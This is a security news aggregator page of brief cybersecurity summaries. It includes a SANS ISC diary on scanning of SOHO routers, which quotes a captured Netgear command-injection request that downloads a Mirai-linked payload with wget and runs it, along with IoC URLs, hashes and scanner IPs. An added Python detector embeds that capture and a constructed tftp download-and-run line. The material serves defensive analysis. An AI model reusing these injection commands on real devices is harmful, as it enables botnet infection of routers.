Malware Devil

Sunday, October 4, 2020

Network Security News Summary for Monday October 5 2020

A brief daily summary of what is important in cybersecurity. The podcast is published every weekday and designed to get you ready for the day with a brief, usually about 5 minutes long, summary of current network security-related events. The content is late breaking, educational and based on listener input as well as on input received by the SANS Internet Storm Center. You may submit questions and comments via our contact form at https://isc.sans.edu/contact.html.

The post Network Security News Summary for Monday October 5 2020 appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/network-security-news-summary-for-monday-october-5-2020/

DEF CON Safe Mode Recon Village – Mauro Eldritch’s ‘COVID 1984 Pandemic Propaganda And Surveillance’

Many thanks to DEF CON and the conference speakers for publishing their comprehensive and outstanding presentations, which originally appeared at the organization’s DEF CON 28 Safe Mode conference and on the DEF CON YouTube channel. Enjoy!

The post DEF CON Safe Mode Recon Village – Mauro Eldritch’s ‘COVID 1984 Pandemic Propaganda And Surveillance’ appeared first on Security Boulevard.

The post DEF CON Safe Mode Recon Village – Mauro Eldritch’s ‘COVID 1984 Pandemic Propaganda And Surveillance’ appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/def-con-safe-mode-recon-village-mauro-eldritchs-covid-1984-pandemic-propaganda-and-surveillance/

Industrial Systems Face Increasing Cyberattacks

Researchers have witnessed an increased prevalence of malware campaigns targeting operational technology (OT) networks, with building automation and oil & gas firms being prominent targets.

The post Industrial Systems Face Increasing Cyberattacks appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/industrial-systems-face-increasing-cyberattacks/

Playing Trick and No Treat with Malicious Apps

Last month, researchers spotted 17 Android apps infected with the Joker trojan in Google Play Store. These malicious apps posed as utility service apps to bypass the Google Play vetting process.

The post Playing Trick and No Treat with Malicious Apps appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/playing-trick-and-no-treat-with-malicious-apps/

Robert M. Lee’s & Jeff Haas’ Little Bobby Comics – ‘WEEK 297’

via the respected information security capabilities of Robert M. Lee & the superlative illustration talents of Jeff Haas at Little Bobby Comics.

The post Robert M. Lee’s & Jeff Haas’ Little Bobby Comics – ‘WEEK 297’ appeared first on Security Boulevard.

The post Robert M. Lee’s & Jeff Haas’ Little Bobby Comics – ‘WEEK 297’ appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/robert-m-lees-jeff-haas-little-bobby-comics-week-297/

DEF CON 28 Safe Mode Recon Village – Ladislav Baco’s ‘Hunting For Blue Mockingbird Coinminers’

Many thanks to DEF CON and the conference speakers for publishing their comprehensive and outstanding presentations, which originally appeared at the organization’s DEF CON 28 Safe Mode conference and on the DEF CON YouTube channel. Enjoy!

The post DEF CON 28 Safe Mode Recon Village – Ladislav Baco’s ‘Hunting For Blue Mockingbird Coinminers’ appeared first on Security Boulevard.

The post DEF CON 28 Safe Mode Recon Village – Ladislav Baco’s ‘Hunting For Blue Mockingbird Coinminers’ appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/def-con-28-safe-mode-recon-village-ladislav-bacos-hunting-for-blue-mockingbird-coinminers/

Top Anti-Phishing Software Approach

What are the top software solutions for stopping phishing? By starting at where employees change their passwords, IT admins can avoid phishing altogether.

The post Top Anti-Phishing Software Approach appeared first on JumpCloud.

The post Top Anti-Phishing Software Approach appeared first on Security Boulevard.

The post Top Anti-Phishing Software Approach appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/top-anti-phishing-software-approach/

DHS Works to Protect National Critical Infrastructure

Last month, the Cybersecurity and Infrastructure Security Agency (CISA), which is part of the U.S. Department of Homeland Security (DHS), published two important resources that deserve special attention. While many of these CISA status reports may seem a bit like “alphabet soup” to those not familiar with the process, the importance of this National Critical..

The post DHS Works to Protect National Critical Infrastructure appeared first on Security Boulevard.

The post DHS Works to Protect National Critical Infrastructure appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/dhs-works-to-protect-national-critical-infrastructure/

Nmap 7.90 Released, (Sun, Oct 4th)

Nmap 7.90 has been released, right after the release of Npcap 1.00.

Two elements from the announcement I want to highlight:

  • With the production-ready and highly performant Npcap 1.00 driver included, we can finally recommend Nmap on Windows as a true peer to the traditional Linux builds.
  • We also did some long-needed license cleanup and gave the license a name (Nmap Public Source License) to avoid the previous confusion of Nmap being under "GPLv2 with various clarifications and exceptions". The NPSL is still based on the GPLv2, but brings in terms from some other popular open source licenses.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

The post Nmap 7.90 Released, (Sun, Oct 4th) appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/nmap-7-90-released-sun-oct-4th/

Saturday, October 3, 2020

Scanning for SOHO Routers, (Sat, Oct 3rd)

In the past 30 days there has been a lot of scanning activity looking for small office and home office (SOHO) routers, in particular Netgear devices.

20201002-165049: 192.168.25.9:80-119.180.57.184:41237 data 'GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//119.180.57.184:59209/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0\r\n\r\n'

Analysis of multiple Mozi.a and Mozi.m samples indicates that, if the injection succeeds, the downloaded payload attempts to connect the router to the Mirai botnet.

However, one of the recovered file samples (Astra.mpsl) was never submitted to VirusTotal or any other sandbox and remained unidentified. Based on the information contained in the file, it targets the Huawei Home Gateway. One of the telltale signs in the binary is the following string: ‘Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS‘, which likely indicates it would connect the router to the Hoaxcalls botnet.

This is part of the content of Astra.mpsl, which shows that the targeted router is the Huawei Home Gateway.

Suspicious Files and Scripts: Mozi.a/m (Mirai Botnet), MD5

dbc520ea1518748fec9fcfcf29755c30
a73ddd6ec22462db955439f665cad4e6
b9e122860983d035a21f6984a92bfb22
521891351436e7e75ec2cdb91b0baf50

Suspicious Files and Scripts: Astra.mpsl (Hoaxcalls Botnet)

MD5:    98eaa9a34533606924911ef15162102f  Astra.mpsl
SHA256: cf6b4ccfc0414297a8a31c9349b6c3c246716829d4a15f3a2d3deae10bc2efde  Astra.mpsl

Indicators of Compromise

http[:]//192.210.214[.]51/bins/Astra.mpsl

SOHO Active Scanners

27.207.194.123
27.210.108.15
27.213.84.41
27.216.242.224
27.219.150.79
27.223.154.5
27.7.22.165
36.108.150.212
39.73.200.19
39.73.236.243
39.79.144.247
39.79.147.27
39.89.127.82
42.224.242.180
42.228.32.216
42.230.71.48
42.238.170.82
61.52.157.50
61.52.39.30
61.53.119.125
61.54.41.81
84.214.97.9
103.41.29.30
103.84.241.79
103.84.4.84
112.17.66.38
112.225.189.192
112.237.9.59
112.238.54.117
112.249.81.157
113.195.166.211
113.239.246.91
114.236.199.151
115.48.146.248
115.48.154.223
115.54.110.193
115.55.157.197
115.55.183.60
115.56.186.31
115.63.19.7
115.98.217.41
115.98.49.24
115.99.89.30
116.72.200.142
116.73.70.170
118.250.45.18
118.254.113.93
119.178.132.203
119.180.57.184
123.27.42.4
123.8.189.248
124.129.126.228
125.135.108.75
125.44.15.24
125.79.22.246
149.3.73.125
182.116.119.122
182.117.82.151
182.119.21.124
182.120.52.29
182.121.42.152
182.123.202.96
182.126.93.176
182.56.178.146
182.59.222.138
183.15.207.240
186.29.208.88
188.169.167.249
189.201.249.111
202.83.42.113
202.83.42.179
202.83.42.201
219.155.212.31
221.14.167.205
221.15.127.77
222.141.165.21
222.187.177.213
223.155.183.140
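
The capture at the top of this diary shows the request shape a defender wants to alert on. As an added example (not part of the diary or of any SANS ISC tooling), the Python below parses log lines in the same "timestamp: dst:port-src:port data '...'" layout, flags a Netgear setup.cgi request that carries todo=syscmd together with a cmd parameter, pulls the download URLs and payload hosts out of the injected command, and tags sources that appear in the scanner list. The log layout, the regular expressions and the second and third sample lines are my assumptions and constructions (the made-up lines use RFC 5737 documentation addresses); the first sample line reproduces the diary's capture, and the scanner subset is taken from the list above.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log in the "timestamp: dst:port-src:port data '...'" layout of the
# capture in the diary. Line 1 reproduces the diary's Netgear setup.cgi capture (CRLFs written
# out); lines 2 and 3 are made up for contrast, using RFC 5737 documentation addresses: a benign
# request and a second injection attempt that fetches its payload over TFTP.
SAMPLE_LOG = """\
20201002-165049: 192.168.25.9:80-119.180.57.184:41237 data 'GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//119.180.57.184:59209/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0\\r\\n\\r\\n'
20201002-170112: 192.168.25.9:80-203.0.113.7:51234 data 'GET /index.html HTTP/1.1\\r\\n\\r\\n'
20201002-171500: 192.168.25.9:80-198.51.100.9:40001 data 'GET /setup.cgi?todo=syscmd&cmd=cd+/tmp;tftp+-g+-r+bot.mips+198.51.100.9;sh+bot.mips HTTP/1.0\\r\\n\\r\\n'
"""

# Subset of the diary's "SOHO Active Scanners" list, used to tag hits from already-known sources.
SOHO_SCANNERS = {"119.180.57.184", "27.207.194.123", "39.73.200.19"}

LOG_RE = re.compile(
    r"^(?P<ts>\d{8}-\d{6}): "
    r"(?P<dst>[\d.]+):(?P<dport>\d+)-(?P<src>[\d.]+):(?P<sport>\d+) "
    r"data '(?P<data>.*)'$"
)
REQ_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+")
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s;&|'\"]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
EXEC_RE = re.compile(r"\b(sh|chmod)\b")


def refang(text):
    """Undo the [:] / [.] defanging that reports (and this diary) use for URLs."""
    return text.replace("[:]", ":").replace("[.]", ".")


def parse_query(query):
    """Split a query string on '&' only. ';' must stay inside values because the injected
    command uses it as a shell separator (parse_qs on older Pythons also splits on ';')."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def parse_line(line):
    """Return timestamp, endpoints, method, path and query for one capture line, or None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    req = REQ_RE.match(rec["data"])
    if not req:
        return None
    rec["method"] = req.group("method")
    path, _, query = req.group("target").partition("?")
    rec["path"] = path
    rec["query"] = parse_query(query)
    return rec


def assess(rec):
    """Classify one parsed request and extract the payload URLs and hosts it references."""
    findings = []
    q = rec["query"]
    # setup.cgi with todo=syscmd plus a cmd parameter is the injection shape in the diary's capture.
    if rec["path"].endswith("/setup.cgi") and q.get("todo") == ["syscmd"] and "cmd" in q:
        findings.append("netgear-setup.cgi-syscmd")
    cmd = refang(" ".join(q.get("cmd", [])))
    if DOWNLOADER_RE.search(cmd):
        findings.append("downloader-in-command")
    if EXEC_RE.search(cmd):
        findings.append("executes-dropped-file")
    return {
        "ts": rec["ts"], "src": rec["src"], "path": rec["path"],
        "findings": findings,
        "payload_urls": URL_RE.findall(cmd),
        "payload_hosts": list(dict.fromkeys(IPV4_RE.findall(cmd))),  # dedupe, keep order
        "known_scanner": rec["src"] in SOHO_SCANNERS,
    }


def scan(log_text):
    """Parse and assess every line; lines that are not HTTP captures are skipped."""
    results = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            results.append(assess(rec))
    return results


def suspicious(results):
    """Only the records worth alerting on: anything with at least one finding."""
    return [r for r in results if r["findings"]]


if __name__ == "__main__":
    for r in suspicious(scan(SAMPLE_LOG)):
        print(r["ts"], r["src"], r["findings"], r["payload_urls"] or r["payload_hosts"],
              "(known scanner)" if r["known_scanner"] else "")
```

The query string is split by hand rather than with urllib's parse_qs because the injected command relies on ';' as a shell separator, and some Python versions treat ';' as a query separator, which would hide the wget and sh stages from the classifier. The payload URLs and hosts it returns are what you would block at the egress firewall or feed into the IoC list.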

[1] https://isc.sans.edu/forums/diary/Mirai+Botnet+Activity/26234/
[2] https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/
[3] https://consumer.huawei.com/en/routers/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

The post Scanning for SOHO Routers, (Sat, Oct 3rd) appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/scanning-for-soho-routers-sat-oct-3rd/

What Is Smishing? Definition, Examples & Protection Tips

While SMS phishing text scams are nothing new, they’re a type of threat that’s gaining traction with cybercriminals. Proofpoint reports that 84% of organizations faced smishing attacks in 2019 alone……

The post What Is Smishing? Definition, Examples & Protection Tips appeared first on Hashed Out by The SSL Store™.

The post What Is Smishing? Definition, Examples & Protection Tips appeared first on Security Boulevard.

The post What Is Smishing? Definition, Examples & Protection Tips appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/what-is-smishing-definition-examples-protection-tips/

How Remote Systems Communicate with Active Directory

Learn different challenges of managing Active Directory bound devices in the shifting work from home environment and how JumpCloud can help for free.

The post How Remote Systems Communicate with Active Directory appeared first on JumpCloud.

The post How Remote Systems Communicate with Active Directory appeared first on Security Boulevard.

The post How Remote Systems Communicate with Active Directory appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/how-remote-systems-communicate-with-active-directory/

OldGremlin Definitely Did That!

The OldGremlin threat actor group has been targeting Russian companies, including financial institutions, medical firms, and industrial enterprises, with ransomware attacks.

The post OldGremlin Definitely Did That! appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/oldgremlin-definitely-did-that/

The Game of Credential Abuse

Gamer credentials have become a lucrative target for cybercriminals. According to a recent Akamai study, the accounts of 55% of online gamers have been compromised at some point.

The post The Game of Credential Abuse appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/the-game-of-credential-abuse/

Cybersecurity Takes Top Tech Priority as COVID-19 Spurs Transformation Projects

  • Survey of over 600 IT leaders reveals the extent of COVID-19 disruption from a technological standpoint
  • Areas like cybersecurity, network infrastructure and cloud strategy need urgent adaptation for a distributed workforce
  • Cybersecurity is the top technology priority for digital transformation projects

A new survey sheds light on the highest priorities for IT teams in light of COVID-19 (i.e. remote workforce). According to the findings, cybersecurity is now a top-of-the-list priority, followed by cloud, data analytics and network infrastructure, as organizations urgently modernize their core technologies.

The post Cybersecurity Takes Top Tech Priority as COVID-19 Spurs Transformation Projects appeared first on Security Boulevard.

The post Cybersecurity Takes Top Tech Priority as COVID-19 Spurs Transformation Projects appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/cybersecurity-takes-top-tech-priority-as-covid-19-spurs-transformation-projects/

Cisco Acquires Kubernetes-Native Security Platform Portshift

Founded in 2018, Portshift focuses on providing security for Kubernetes and containers and takes an agentless approach to deliver vulnerability protection across images, containers, and deployments.

The post Cisco Acquires Kubernetes-Native Security Platform Portshift appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/cisco-acquires-kubernetes-native-security-platform-portshift/

Facebook Details Malware Campaign Targeting Its Ad Platform

Referred to as SilentFade (Silently running Facebook ADs with Exploits), the malware was identified in late 2018 and the vulnerability it was exploiting to stay undetected was patched soon after.

The post Facebook Details Malware Campaign Targeting Its Ad Platform appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/facebook-details-malware-campaign-targeting-its-ad-platform/

Google sets up research grant for finding bugs in browser JavaScript engines

Google has set up a research grant program to help and sponsor security researchers and academics find vulnerabilities in browser JavaScript engines through the “fuzzing” technique.

The post Google sets up research grant for finding bugs in browser JavaScript engines appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/google-sets-up-research-grant-for-finding-bugs-in-browser-javascript-engines/

Spawn of Demonbot Attacks IoT Devices

The attack, orchestrated by someone using the alias “Priority,” was detected by a team at Juniper Threat Labs. Priority appears to have been up to no good since September 10.

The post Spawn of Demonbot Attacks IoT Devices appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/spawn-of-demonbot-attacks-iot-devices/

LatAm Banking Trojans Collaborate in Never-Before-Seen Effort

A loose affiliation of cybercriminals is working together to author and distribute multiple families of banking trojans in Latin America – a collaborative effort that researchers say is unusual.

The post LatAm Banking Trojans Collaborate in Never-Before-Seen Effort appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/latam-banking-trojans-collaborate-in-never-before-seen-effort-2/

Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...